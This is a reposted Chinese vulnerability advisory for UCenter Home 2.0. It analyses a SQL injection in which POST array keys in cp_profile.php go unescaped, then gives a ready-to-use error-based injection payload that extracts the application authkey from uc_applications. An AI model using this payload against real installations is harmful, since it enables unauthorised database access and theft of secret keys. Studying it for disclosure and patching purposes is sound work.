文章详情

  • 游戏榜单
  • 软件榜单
关闭导航
热搜榜
热门下载
热门标签
php爱好者> php文档>UCenter Home 2.0 鸡叻 SQL 注入

UCenter Home 2.0 鸡叻 SQL 注入

时间:2011-01-23  来源:alibaba

发布日期:2011-01.23
发布作者:alibaba


影响版本:UCenter Home 2.0
官方网站:http://www.discuz.net

漏洞类型:SQL注入
漏洞描述:uc_home 2.0 在magic_quote_gpc off 的环境下只对参数值进行过滤,忽略了参数名导致注入产生。
 

代码分析:

function_common.php    //SQL ADDSLASHES     function saddslashes($string) {     if(is_array($string)) {     foreach($string as $key => $val) {     $string[$key] = saddslashes($val); //只过滤参数值     }     } else {     $string = addslashes($string);     }     return $string;     }    


cp_profile.php 大约56行

//隐私    $inserts = array();    foreach ($_POST['friend'] as $key => $value) {    value = intval($value);    $inserts[] = "('base','$key','$space[uid]','$value')"; //$key 未没过滤    }    if($inserts) {    $_SGLOBAL['db']->query("DELETE FROM ".tname('spaceinfo')." WHERE uid='$space[uid]' AND type='base'");    $_SGLOBAL['db']->query("INSERT INTO ".tname('spaceinfo')." (type,subtype,uid,friend)    VALUES ".implode(',', $inserts)); //这里出现注入漏洞    }   


Exploit:


要求: magic_quote_gpc off
URL: cp.php?ac=profile&op=base

保存时创建一个POST,参数名为:
friend[a',(select 1 from(select count(*),concat((Select concat(substring(authkey,1,64)) FROM uc_applications limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a),'1')#]
参数值: 随意

这里我使用火狐的tamper实时添加POST
 


  得到 uchome的 authkey
 
 

 

标签分类:

相关阅读 更多 +
排行榜 更多 +
谷歌卫星地图免费版下载

谷歌卫星地图免费版下载

生活实用 下载
谷歌卫星地图免费版下载

谷歌卫星地图免费版下载

生活实用 下载
kingsofpool官方正版下载

kingsofpool官方正版下载

赛车竞速 下载